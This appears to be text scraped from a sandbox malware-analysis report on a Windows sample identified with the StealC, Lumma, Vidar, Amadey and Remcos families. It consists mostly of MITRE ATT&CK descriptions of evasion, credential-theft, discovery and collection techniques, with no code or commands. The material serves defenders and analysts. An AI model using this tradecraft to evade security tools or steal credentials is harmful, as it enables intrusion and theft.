Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Threatname: Remcos

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BFCAAEHJDBKJJKFHJEBK

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre